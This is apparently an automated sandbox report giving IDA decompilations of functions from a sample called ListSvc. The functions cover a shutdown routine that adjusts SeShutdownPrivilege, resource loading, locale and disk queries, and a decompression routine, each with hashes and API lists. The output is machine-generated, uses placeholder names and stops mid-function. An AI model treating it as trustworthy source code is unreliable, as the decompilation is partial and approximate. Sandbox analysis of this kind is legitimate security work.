Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameW$\$kernel32.dll
API String ID: 1930782624-3908791685
Opcode ID: 2e7747c66ca0daf9bf73dcf24122f514d4f35ae2d915a4be054088bbf24f0c4d
Instruction ID: 0568a8f2c4c85ac628058e700237ad117df8c3680498263a44950cac296231c5
Opcode Fuzzy Hash: 2e7747c66ca0daf9bf73dcf24122f514d4f35ae2d915a4be054088bbf24f0c4d
Instruction Fuzzy Hash: 7841A071B003189BCB20DE98CD85A9EB3B5AB44310F1485B69945F72C1EB7CAE51CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 004AF110, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004AF110() {
				int _v4;
				struct _TOKEN_PRIVILEGES _v16;
				void* _v20;
				int _t7;

				if(E0041FF2C() != 2) {
					L5:
					_t7 = ExitWindowsEx(2, 0);
					asm("sbb eax, eax");
					return _t7 + 1;
				}
				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v20) != 0) {
					LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v16.Privileges));
					_v16.PrivilegeCount = 1;
					_v4 = 2;
					AdjustTokenPrivileges(_v20, 0,  &_v16, 0, 0, 0);
					if(GetLastError() == 0) {
						goto L5;
					}
					return 0;
				}
				return 0;
			}

0x004af11b
0x004af178
0x004af17c
0x004af184
0x00000000
0x004af186
0x004af12d
0x004af13f
0x004af144
0x004af14c
0x004af166
0x004af172
0x00000000
0x00000000
0x00000000
0x004af174
0x00000000

APIs

GetCurrentProcess.KERNEL32(00000028), ref: 004AF120
OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004AF126
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004AF13F
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF166
GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF16B
ExitWindowsEx.USER32(00000002,00000000), ref: 004AF17C

Strings

SeShutdownPrivilege, xrefs: 004AF138

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 107509674-3733053543
Opcode ID: dbd0b99069aff0d6788c9efc2bbd2c2bb6d4dae2a155ecb9c3cc528dabbfbf9f
Instruction ID: 15d82be9bc359c8987119149698676c325083c88dcd196a4f2f9cd1a299335ef
Opcode Fuzzy Hash: dbd0b99069aff0d6788c9efc2bbd2c2bb6d4dae2a155ecb9c3cc528dabbfbf9f
Instruction Fuzzy Hash: 75F06D70684301B5E610A6F2CD07F6B21C89B56B58FA00D3EBA84E91C2D7BDD81D42BF

Uniqueness

Uniqueness Score: -1.00%

Function 004AF9F0, Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004AF9F0() {
				struct HRSRC__* _t10;
				void* _t11;
				void* _t12;

				_t10 = FindResourceW(0, 0x2b67, 0xa);
				if(_t10 == 0) {
					E004AF834();
				}
				if(SizeofResource(0, _t10) != 0x2c) {
					E004AF834();
				}
				_t11 = LoadResource(0, _t10);
				if(_t11 == 0) {
					E004AF834();
				}
				_t12 = LockResource(_t11);
				if(_t12 == 0) {
					E004AF834();
				}
				return _t12;
			}

0x004af9ff
0x004afa03
0x004afa05
0x004afa05
0x004afa15
0x004afa17
0x004afa17
0x004afa24
0x004afa28
0x004afa2a
0x004afa2a
0x004afa35
0x004afa39
0x004afa3b
0x004afa3b
0x004afa43

APIs

FindResourceW.KERNEL32(00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000,004B659E,?,00000000,004B65E2), ref: 004AF9FA
SizeofResource.KERNEL32(00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000,004B659E), ref: 004AFA0D
LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000), ref: 004AFA1F
LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002), ref: 004AFA30

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 128b44542abe6d6e0e09835f67cf23f4a4e4be27e5836866f54195567a651b81
Instruction ID: 8c15b2061d88d30e204a2d131290402b8da5209396f43898e5d703764eea749b
Opcode Fuzzy Hash: 128b44542abe6d6e0e09835f67cf23f4a4e4be27e5836866f54195567a651b81
Instruction Fuzzy Hash: FCE07E8074634625FA6436F718D7BAE00084B36B4DF40593FFA08A92D2EEAC8C19522E

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4CC, Relevance: 4.6, APIs: 3, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0040A4CC(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				short _v182;
				short _v352;
				char _v356;
				char _v360;
				char _v364;
				int _t58;
				signed int _t61;
				intOrPtr _t70;
				signed short _t80;
				void* _t83;
				void* _t85;
				void* _t86;

				_t77 = __edi;
				_push(__edi);
				_v356 = 0;
				_v360 = 0;
				_v364 = 0;
				_v8 = __edx;
				_t80 = __eax;
				_push(_t83);
				_push(0x40a631);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83 + 0xfffffe98;
				E00407A20(_v8);
				_t85 = _t80 -  *0x4b7a08; // 0x404
				if(_t85 >= 0) {
					_t86 = _t80 -  *0x4b7c08; // 0x7c68
					if(_t86 <= 0) {
						_t77 = 0x40;
						_v12 = 0;
						if(0x40 >= _v12) {
							do {
								_t61 = _t77 + _v12 >> 1;
								if(_t80 >=  *((intOrPtr*)(0x4b7a08 + _t61 * 8))) {
									__eflags = _t80 -  *((intOrPtr*)(0x4b7a08 + _t61 * 8));
									if(__eflags <= 0) {
										E0040A3EC( *((intOrPtr*)(0x4b7a0c + _t61 * 8)), _t61, _v8, _t77, _t80, __eflags);
									} else {
										_v12 = _t61 + 1;
										goto L8;
									}
								} else {
									_t77 = _t61 - 1;
									goto L8;
								}
								goto L9;
								L8:
							} while (_t77 >= _v12);
						}
					}
				}
				L9:
				if( *_v8 == 0 && IsValidLocale(_t80 & 0x0000ffff, 2) != 0) {
					_t58 = _t80 & 0x0000ffff;
					GetLocaleInfoW(_t58, 0x59,  &_v182, 0x55);
					GetLocaleInfoW(_t58, 0x5a,  &_v352, 0x55);
					E0040858C( &_v356, 0x55,  &_v182);
					_push(_v356);
					_push(0x40a64c);
					E0040858C( &_v360, 0x55,  &_v352);
					_push(_v360);
					_push(E0040A65C);
					E0040858C( &_v364, 0x55,  &_v182);
					_push(_v364);
					E004087C4(_v8, _t58, 5, _t77, _t80);
				}
				_pop(_t70);
				 *[fs:eax] = _t70;
				_push(E0040A638);
				return E00407A80( &_v364, 3);
			}

0x0040a4cc
0x0040a4d7
0x0040a4da
0x0040a4e0
0x0040a4e6
0x0040a4ec
0x0040a4ef
0x0040a4f3
0x0040a4f4
0x0040a4f9
0x0040a4fc
0x0040a502
0x0040a507
0x0040a50e
0x0040a510
0x0040a517
0x0040a519
0x0040a520
0x0040a526
0x0040a528
0x0040a52d
0x0040a537
0x0040a53e
0x0040a546
0x0040a558
0x0040a548
0x0040a549
0x00000000
0x0040a549
0x0040a539
0x0040a53b
0x00000000
0x0040a53b
0x00000000
0x0040a55f
0x0040a55f
0x0040a528
0x0040a526
0x0040a517
0x0040a564
0x0040a56a
0x0040a58e
0x0040a592
0x0040a5a3
0x0040a5b9
0x0040a5be
0x0040a5c4
0x0040a5da
0x0040a5df
0x0040a5e5
0x0040a5fb
0x0040a600
0x0040a60e
0x0040a60e
0x0040a615
0x0040a618
0x0040a61b
0x0040a630

APIs

IsValidLocale.KERNEL32(?,00000002,00000000,0040A631,?,004162BC,?,00000000), ref: 0040A576
GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,0040A631,?,004162BC,?,00000000), ref: 0040A592
GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,0040A631,?,004162BC,?,00000000), ref: 0040A5A3

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: Locale$Info$Valid
String ID:
API String ID: 1826331170-0
Opcode ID: 62325bdbcd9f8bf22caa424e6d98428fadf2f4ef7d6ad95b5286de9b97f55654
Instruction ID: 92a11a0233c3b219485afac9e49f2dea99407596d6f7a83949ef3a6145fdf69e
Opcode Fuzzy Hash: 62325bdbcd9f8bf22caa424e6d98428fadf2f4ef7d6ad95b5286de9b97f55654
Instruction Fuzzy Hash: 3831AE70A00308ABDF20DB64DD81BDEBBB9FB48701F5005BBA508B32D1D6395E90CE1A

Uniqueness

Uniqueness Score: -1.00%

Function 0041A4DC, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A4DC(WCHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				WCHAR* _t25;
				int _t26;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr* _t37;
				intOrPtr* _t38;
				intOrPtr _t46;
				intOrPtr _t48;

				_t25 = _a4;
				if(_t25 == 0) {
					_t25 = 0;
				}
				_t26 = GetDiskFreeSpaceW(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t46 = _v24;
				_t31 = E004095A8(_v28, _t46, _v16, 0);
				_t37 = _a8;
				 *_t37 = _t31;
				 *((intOrPtr*)(_t37 + 4)) = _t46;
				_t48 = _v24;
				_t34 = E004095A8(_v28, _t48, _v20, 0);
				_t38 = _a12;
				 *_t38 = _t34;
				 *((intOrPtr*)(_t38 + 4)) = _t48;
				return _t26;
			}

0x0041a4e3
0x0041a4e8
0x0041a4ea
0x0041a4ea
0x0041a4fd
0x0041a50c
0x0041a50f
0x0041a51c
0x0041a51f
0x0041a524
0x0041a527
0x0041a529
0x0041a536
0x0041a539
0x0041a53e
0x0041a541
0x0041a543
0x0041a54c

APIs

GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?), ref: 0041A4FD

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: 35fab30d3ed47bb79bc7b5801678cd6b626cb6661b26d0a6d4a2aa78d0844cce
Instruction ID: 14c90aad059d6341cd8fbca9d1c94cd423dd62e4f1f0ed92fc39ecac232c4210
Opcode Fuzzy Hash: 35fab30d3ed47bb79bc7b5801678cd6b626cb6661b26d0a6d4a2aa78d0844cce
Instruction Fuzzy Hash: 7711C0B5A01209AFDB04CF9ACD819EFB7F9EFC8304B14C569A505E7255E6319E018B94

Uniqueness

Uniqueness Score: -1.00%

Function 0041E034, Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041E034(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				short _v516;
				void* __ebp;
				int _t5;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				_t5 = GetLocaleInfoW(__eax, __edx,  &_v516, 0x100);
				_t19 = _t5;
				if(_t5 <= 0) {
					return E00407E00(_t10, _t18);
				}
				return E00407BA8(_t10, _t5 - 1,  &_v516, _t19);
			}

0x0041e03f
0x0041e041
0x0041e052
0x0041e057
0x0041e059
0x00000000
0x0041e071
0x00000000

APIs

GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041E052

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: d1249f9bfb9152180de995f4510b089303b0330b3d36e5e1fa950d916a740853
Instruction ID: c90943d4e22265a1f7ecf9aede9ac9faa011377f579ac525cbc4109061889d1c
Opcode Fuzzy Hash: d1249f9bfb9152180de995f4510b089303b0330b3d36e5e1fa950d916a740853
Instruction Fuzzy Hash: C7E09235B0421427E314A55A9C86AE7725D9B48340F40457FBD05D7382EDB9AE8042E9

Uniqueness

Uniqueness Score: -1.00%

Function 0041E080, Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041E080(int __eax, signed int __ecx, int __edx) {
				short _v16;
				signed int _t5;
				signed int _t10;

				_push(__ecx);
				_t10 = __ecx;
				if(GetLocaleInfoW(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t10;
				} else {
					_t5 = _v16 & 0x0000ffff;
				}
				return _t5;
			}

0x0041e083
0x0041e084
0x0041e09a
0x0041e0a2
0x0041e09c
0x0041e09c
0x0041e09c
0x0041e0a8

APIs

GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0041E182,?,00000001,00000000,0041E391), ref: 0041E093

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: c2a2e253f202cad765f8f9b35123567cb33a3e9031303696ff7b3b42dc5ba059
Instruction ID: 961adf842b5e4829a7f1cb68f4be235500f18d0b61d537998bbd462cca006134
Opcode Fuzzy Hash: c2a2e253f202cad765f8f9b35123567cb33a3e9031303696ff7b3b42dc5ba059
Instruction Fuzzy Hash: 45D05EBA31923476E214915B6E85DB75ADCCBC87A2F14483BBE4CC6241D2A4CC46A275

Uniqueness

Uniqueness Score: -1.00%

Function 004AF218, Relevance: 1.5, APIs: 1, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004AF218(signed int __eax) {
				short _v8;
				signed int _t6;

				_t6 = GetLocaleInfoW(__eax & 0x0000ffff, 0x20001004,  &_v8, 2);
				if(_t6 <= 0) {
					return _t6 | 0xffffffff;
				}
				return _v8;
			}

0x004af22e
0x004af235
0x00000000
0x004af23c
0x00000000

APIs

GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,004AF318), ref: 004AF22E

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 91ef75d91c3bf0fbfb4c903f00eadddcc0e9dd42321a82c412adf8826a4a964a
Instruction ID: 3cbbb47bc5e3852376f83ef88ad8e7e21f22c900a58d153b56eed97a123c5839
Opcode Fuzzy Hash: 91ef75d91c3bf0fbfb4c903f00eadddcc0e9dd42321a82c412adf8826a4a964a
Instruction Fuzzy Hash: E8D0A5F55442087DF504C1DA5D82FB673DCD705374F500767F654C52C1D567EE015219

Uniqueness

Uniqueness Score: -1.00%

Function 0041C3D8, Relevance: 1.5, APIs: 1, Instructions: 6
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041C3D8() {
				struct _SYSTEMTIME* _t2;

				GetLocalTime(_t2);
				return _t2->wYear & 0x0000ffff;
			}

0x0041c3dc
0x0041c3e8

APIs

GetLocalTime.KERNEL32 ref: 0041C3DC

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: 2bbd9f916a85fd19aaf3e135de3c6f6031220cebfdbc254b78c71648618a48a1
Instruction ID: 79eafb11b28f80ce797d6e9fe134e5764476c7cb5db39d72cf417c4d7be8b418
Opcode Fuzzy Hash: 2bbd9f916a85fd19aaf3e135de3c6f6031220cebfdbc254b78c71648618a48a1
Instruction Fuzzy Hash: DAA0122080582011D140331A0C0313530405900620FC40F55BCF8542D1E93D013440D7

Uniqueness

Uniqueness Score: -1.00%

Function 004255DC, Relevance: .5, Instructions: 545
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004255DC(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				char _v25;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				char _v64;
				char* _v68;
				void* _v72;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed int _v88;
				char _v89;
				char _v96;
				signed int _v100;
				signed int _v104;
				short* _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				char _v136;
				signed int _t370;
				void* _t375;
				signed int _t377;
				signed int _t381;
				signed int _t389;
				signed int _t395;
				signed int _t411;
				intOrPtr _t422;
				signed int _t426;
				signed int _t435;
				void* _t448;
				signed int _t458;
				char _t460;
				signed int _t474;
				char* _t503;
				signed int _t508;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t622;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 =  *((intOrPtr*)(_v8 + 0x10));
				_v24 = 0;
				_v32 = (1 <<  *(_v8 + 8)) - 1;
				_v36 = (1 <<  *(_v8 + 4)) - 1;
				_v40 =  *_v8;
				_t617 =  *((intOrPtr*)(_v8 + 0x34));
				_t474 =  *(_v8 + 0x44);
				_v44 =  *((intOrPtr*)(_v8 + 0x38));
				_v48 =  *((intOrPtr*)(_v8 + 0x3c));
				_v52 =  *((intOrPtr*)(_v8 + 0x40));
				_v56 =  *((intOrPtr*)(_v8 + 0x48));
				_v60 =  *((intOrPtr*)(_v8 + 0x2c));
				_v64 =  *((intOrPtr*)(_v8 + 0x30));
				_v68 =  *((intOrPtr*)(_v8 + 0x1c));
				_v72 =  *((intOrPtr*)(_v8 + 0xc));
				_t616 =  *((intOrPtr*)(_v8 + 0x28));
				_v128 =  *((intOrPtr*)(_v8 + 0x20));
				_v124 =  *((intOrPtr*)(_v8 + 0x24));
				_v120 = _v12;
				_v136 =  *((intOrPtr*)(_v8 + 0x14));
				_v132 =  *((intOrPtr*)(_v8 + 0x18));
				 *_a4 = 0;
				if(_v56 == 0xffffffff) {
					return 0;
				}
				__eflags = _v72;
				if(_v72 == 0) {
					_v68 =  &_v76;
					_v72 = 1;
					_v76 =  *((intOrPtr*)(_v8 + 0x4c));
				}
				__eflags = _v56 - 0xfffffffe;
				if(_v56 != 0xfffffffe) {
					L12:
					_v108 = _v16 + _v24;
					while(1) {
						__eflags = _v56;
						if(_v56 == 0) {
							break;
						}
						__eflags = _v24 - _a8;
						if(_v24 < _a8) {
							_t458 = _t616 - _t617;
							__eflags = _t458 - _v72;
							if(_t458 >= _v72) {
								_t458 = _t458 + _v72;
								__eflags = _t458;
							}
							_t460 =  *((intOrPtr*)(_v68 + _t458));
							 *((char*)(_v68 + _t616)) = _t460;
							 *_v108 = _t460;
							_v24 = _v24 + 1;
							_v108 = _v108 + 1;
							_t616 = _t616 + 1;
							__eflags = _t616 - _v72;
							if(_t616 == _v72) {
								_t616 = 0;
								__eflags = 0;
							}
							_t116 =  &_v56;
							 *_t116 = _v56 - 1;
							__eflags =  *_t116;
							continue;
						}
						break;
					}
					__eflags = _t616;
					if(_t616 != 0) {
						_v25 =  *((intOrPtr*)(_v68 + _t616 - 1));
					} else {
						_v25 =  *((intOrPtr*)(_v68 + _v72 - 1));
					}
					__eflags = 0;
					_v116 = 0;
					_v112 = 0;
					while(1) {
						L24:
						_v108 = _v16 + _v24;
						__eflags = _v24 - _a8;
						if(_v24 >= _a8) {
							break;
						} else {
							goto L25;
						}
						while(1) {
							L25:
							_v88 = _v24 + _v60 & _v32;
							__eflags = _v116;
							if(_v116 != 0) {
								break;
							}
							__eflags = _v112;
							if(_v112 == 0) {
								_t370 = E00425334((_t474 << 4) + (_t474 << 4) + _v20 + _v88 + _v88,  &_v136);
								__eflags = _t370;
								if(_t370 != 0) {
									_t375 = E00425334(_t474 + _t474 + _v20 + 0x180,  &_v136);
									__eflags = _t375 != 1;
									if(_t375 != 1) {
										_v52 = _v48;
										_v48 = _v44;
										_v44 = _t617;
										__eflags = _t474 - 7;
										if(__eflags >= 0) {
											_t377 = 0xa;
										} else {
											_t377 = 7;
										}
										_t474 = _t377;
										_v56 = E004254E4(_v20 + 0x664, _v88,  &_v136, __eflags);
										_t503 =  &_v136;
										__eflags = _v56 - 4;
										if(_v56 >= 4) {
											_t381 = 3;
										} else {
											_t381 = _v56;
										}
										_v100 = E004253BC((_t381 << 6) + (_t381 << 6) + _v20 + 0x360, _t503, 6);
										__eflags = _v100 - 4;
										if(_v100 < 4) {
											_t618 = _v100;
										} else {
											_v104 = (_v100 >> 1) - 1;
											_t524 = _v104;
											_t622 = (_v100 & 0x00000001 | 0x00000002) << _v104;
											__eflags = _v100 - 0xe;
											if(_v100 >= 0xe) {
												_t395 = E004252D4( &_v136, _t524, _v104 + 0xfffffffc);
												_t618 = _t622 + (_t395 << 4) + E00425400(_v20 + 0x644,  &_v136, 4);
											} else {
												_t618 = _t622 + E00425400(_t622 + _t622 + _v20 + 0x560 - _v100 + _v100 + 0xfffffffe,  &_v136, _v104);
											}
										}
										_t617 = _t618 + 1;
										__eflags = _t617;
										if(_t617 != 0) {
											L82:
											_v56 = _v56 + 2;
											__eflags = _t617 - _v64;
											if(_t617 <= _v64) {
												__eflags = _v72 - _v64 - _v56;
												if(_v72 - _v64 <= _v56) {
													_v64 = _v72;
												} else {
													_v64 = _v64 + _v56;
												}
												while(1) {
													_t389 = _t616 - _t617;
													__eflags = _t389 - _v72;
													if(_t389 >= _v72) {
														_t389 = _t389 + _v72;
														__eflags = _t389;
													}
													_v25 =  *((intOrPtr*)(_v68 + _t389));
													 *((char*)(_v68 + _t616)) = _v25;
													_t616 = _t616 + 1;
													__eflags = _t616 - _v72;
													if(_t616 == _v72) {
														_t616 = 0;
														__eflags = 0;
													}
													_v56 = _v56 - 1;
													 *_v108 = _v25;
													_v24 = _v24 + 1;
													_v108 = _v108 + 1;
													__eflags = _v56;
													if(_v56 == 0) {
														break;
													}
													__eflags = _v24 - _a8;
													if(_v24 < _a8) {
														continue;
													}
													break;
												}
												L93:
												__eflags = _v24 - _a8;
												if(_v24 < _a8) {
													continue;
												}
												goto L94;
											}
											return 1;
										} else {
											_v56 = 0xffffffff;
											goto L94;
										}
									}
									_t411 = E00425334(_t474 + _t474 + _v20 + 0x198,  &_v136);
									__eflags = _t411;
									if(_t411 != 0) {
										__eflags = E00425334(_t474 + _t474 + _v20 + 0x1b0,  &_v136);
										if(__eflags != 0) {
											__eflags = E00425334(_t474 + _t474 + _v20 + 0x1c8,  &_v136);
											if(__eflags != 0) {
												_t422 = _v52;
												_v52 = _v48;
											} else {
												_t422 = _v48;
											}
											_v48 = _v44;
										} else {
											_t422 = _v44;
										}
										_v44 = _t617;
										_t617 = _t422;
										L65:
										_v56 = E004254E4(_v20 + 0xa68, _v88,  &_v136, __eflags);
										__eflags = _t474 - 7;
										if(_t474 >= 7) {
											_t426 = 0xb;
										} else {
											_t426 = 8;
										}
										_t474 = _t426;
										goto L82;
									}
									__eflags = E00425334((_t474 << 4) + (_t474 << 4) + _v20 + _v88 + _v88 + 0x1e0,  &_v136);
									if(__eflags != 0) {
										goto L65;
									}
									__eflags = _v64;
									if(_v64 != 0) {
										__eflags = _t474 - 7;
										if(_t474 >= 7) {
											_t508 = 0xb;
										} else {
											_t508 = 9;
										}
										_t474 = _t508;
										_t435 = _t616 - _t617;
										__eflags = _t435 - _v72;
										if(_t435 >= _v72) {
											_t435 = _t435 + _v72;
											__eflags = _t435;
										}
										_v25 =  *((intOrPtr*)(_v68 + _t435));
										 *((char*)(_v68 + _t616)) = _v25;
										_t616 = _t616 + 1;
										__eflags = _t616 - _v72;
										if(_t616 == _v72) {
											_t616 = 0;
											__eflags = 0;
										}
										 *_v108 = _v25;
										_v24 = _v24 + 1;
										__eflags = _v64 - _v72;
										if(_v64 < _v72) {
											_v64 = _v64 + 1;
										}
										goto L24;
									}
									return 1;
								}
								_t448 = (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) * 2 + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) * 2 + _v20 + 0xe6c;
								__eflags = _t474 - 7;
								if(__eflags < 0) {
									_v25 = E00425444(_t448,  &_v136, __eflags);
								} else {
									_v96 = _t616 - _t617;
									__eflags = _v96 - _v72;
									if(__eflags >= 0) {
										_t161 =  &_v96;
										 *_t161 = _v96 + _v72;
										__eflags =  *_t161;
									}
